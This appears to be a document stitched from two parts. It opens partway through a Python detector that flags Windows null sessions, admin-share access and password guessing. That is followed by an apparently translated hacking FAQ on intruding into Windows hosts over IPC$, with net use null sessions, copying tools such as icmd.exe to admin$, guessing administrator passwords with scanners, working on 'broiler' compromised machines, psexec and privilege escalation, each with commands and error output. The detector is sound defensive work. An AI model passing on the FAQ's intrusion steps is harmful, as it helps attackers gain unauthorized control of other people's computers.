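ADMIN_SHARES = {"ADMIN$", "C$", "D$", "E$"}   # the default shares named in the article
GUESS_THRESHOLD = 3                            # failed network logons per source address


def load_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def share_basename(share: str) -> str:
    # "\\*\IPC$" -> "IPC$"
    return share.rsplit("\\", 1)[-1].upper()


def detect(events: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (rule, source ip, detail) alerts in event-stream order."""
    alerts: List[Tuple[str, str, str]] = []
    failures: Counter = Counter()
    for e in events:
        eid, ip = e.get("EventID"), e.get("IpAddress", "?")
        if eid == 4624 and e.get("LogonType") == 3 and e.get("TargetUserSid") == "S-1-5-7":
            # A null session: network logon whose token carries the anonymous SID.
            alerts.append(("null-session-logon", ip, e.get("TargetUserName", "")))
        elif eid == 5140:
            share = share_basename(e.get("ShareName", ""))
            user = e.get("SubjectUserName", "")
            if share == "IPC$" and user == "ANONYMOUS LOGON":
                alerts.append(("anonymous-ipc$-access", ip, share))
            elif share in ADMIN_SHARES:
                # Default shares reached over the network: expected from management
                # hosts, worth a look from anywhere else.
                alerts.append(("default-share-access", ip, f"{user} -> {share}"))
        elif eid == 4625 and e.get("LogonType") == 3:
            # Password guessing over ipc$ shows up as a run of failed network logons.
            failures[ip] += 1
            if failures[ip] == GUESS_THRESHOLD:
                alerts.append(("password-guessing", ip, f"{failures[ip]} failed network logons"))
    return alerts
```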
2. Why can the following situation connect but not copy?
net use \\***.***.***.***\ipc$ "password" /user:"username"
Command succeeded
copy icmd.exe \\***.***.***.***\admin$
Cannot find the network path
The command is not successful
Answer: "Cannot find the network path", "Cannot find the network name" and similar problems are mostly because the shared folder you want to copy to is not open, so an error occurs during copying. Try other shared folders.
3. The other side has IPC$ open and I can establish a null connection, but when I open the C and D drives a password is required. I know a null connection does not have much permission, but is there no other way?
Answer: It is recommended to use streamer or other scanning software to try to guess the password. If you can’t guess it, you can only give up. After all, the ability of empty connections is limited.
4. I have guessed the administrator's password and connected with ipc$ successfully, but net view \\ip shows that the default shares are not open. What should I do?
Answer: First, let me correct a mistake of yours: you cannot see the default shares with net view \\ip. Try copying a file to c$ and d$; if that does not work, the default shares have been turned off, and then you can use opentelnet.exe or psexec.exe as described above.
5. After the ipc$ connection succeeded, I used the following command to create an account, but found that the account was created on my own machine. What is going on?
net user ccbirds /add
Answer: A successful ipc$ connection only means that you have established a communication tunnel with the remote host; it does not mean you have obtained a shell. Only after obtaining a shell (such as telnet) can you create an account on the remote machine; otherwise your operation is carried out locally.
6. I have already gotten into a broiler (compromised machine) with its administrator account. I can see its system time, but copying a program to its machine fails; every time it says "Access is denied, 0 file(s) copied". Is there some service the other side has not started? What should I do?
Answer: Generally, "Access is denied" is the result of insufficient permissions. The account you are using may have a problem. There is another possibility: if you get this error when copying to an ordinary shared folder, it means the users allowed to access that folder do not include you (even if you are an administrator); I analyzed this point in the previous issue's article.
7. Can I establish an ipc$ connection with the other side from Win98?
Answer: In theory, no. For ipc$ operations I recommend using Win2000; other operating systems bring a lot of unnecessary trouble.
8. I used net use \\ip\ipc$ "" /user:"" and successfully established a null session, but nbtstat -A IP cannot export the user list. Why?
Answer: By default a null session can export the user list, but if the administrator has modified the registry to prohibit exporting it, what you describe will happen. It is also possible that your own NBT is not enabled, since the nbtstat command is built on NBT.
9. When establishing an ipc$ connection I get this message: 'The credentials supplied conflict with an existing set of credentials'. What is going on?
Answer: Heh, this means you have already established an ipc$ connection with the target host; two ipc$ connections between the same two hosts at the same time are not allowed.
10. When mapping a drive I get:
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。
What is going on here?
Answer: You are being careless: this means you already have an h: drive. Map to a drive letter that is not in use!
11. I established a connection with f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" successfully, but when mapping a drive I get an error asking me for a password. What is going on?
F:\>net use h: \\*.*.*.*\c$
密码在\\*.*.*.*\c$无效。
请键入\\*.*.*.*\c$的密码 :
系统发生 5 错误。
拒绝访问。
Answer: Heh, being asked for a password shows that the user you are currently using does not have enough permission to map the default share C$. Find a way to elevate your privileges or look for a weak administrator password! Default shares generally require administrator permissions.
12. I found a host with port 139 open using superscan, but why can't I make a null connection?
Answer: You are confusing the relationship between ipc$ and port 139. A host that accepts ipc$ connections must have port 139 or 445 open, but a host with those ports open does not necessarily accept null connections, because the other side can turn off the ipc$ share.
13. Most of the machines on our LAN are XP. Using streamer I found several administrator accounts with empty passwords and can connect to them, but cannot copy anything; it reports error 5. Why?
Answer: XP's security is somewhat higher. In the default security policy, network logons with local accounts are authenticated as Guest; even if you log in remotely as administrator, you only have Guest permissions, so copying a file naturally gives error 5: insufficient permissions.
14. net use \\192.168.0.2\ipc$ "password" /user:"administrator" succeeds, but net use i: \\192.168.0.2\c
prompts "Enter the password for \\192.168.0.2". What is going on? I am using the administrator account; shouldn't I be able to access everything?
Answer: Although you have administrator permissions, when the administrator set the share permissions on the c drive (note: ordinary shares can have access permissions set, but default shares cannot) he may not have allowed administrator access, hence the problem above.
15. If my own machine has ipc$ disabled, can I still use ipc$ to connect to other machines? What if the Server service is disabled?
Answer: With both of those disabled you can still initiate ipc$ connections, but for questions like this it is better to try it yourself.
16. Can you tell me the cause of the following two errors?
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。
c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。
Answer: When I first saw this I was puzzled too. Error 5 means insufficient permissions, but even a null session has enough permission for those two commands, so why didn't they work for him? Could it be that he had not established a connection? Later that careless comrade told me that was indeed the case: he had forgotten that he had already deleted the ipc$ connection, then entered those two commands, and error 5 followed.
17. Could you look at what is going on here?
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。
Answer: The answer is simple: your command is wrong. It should be net time \\ip
Without an IP address, of course the server cannot be found. The view command also needs an IP address, i.e. net view \\ip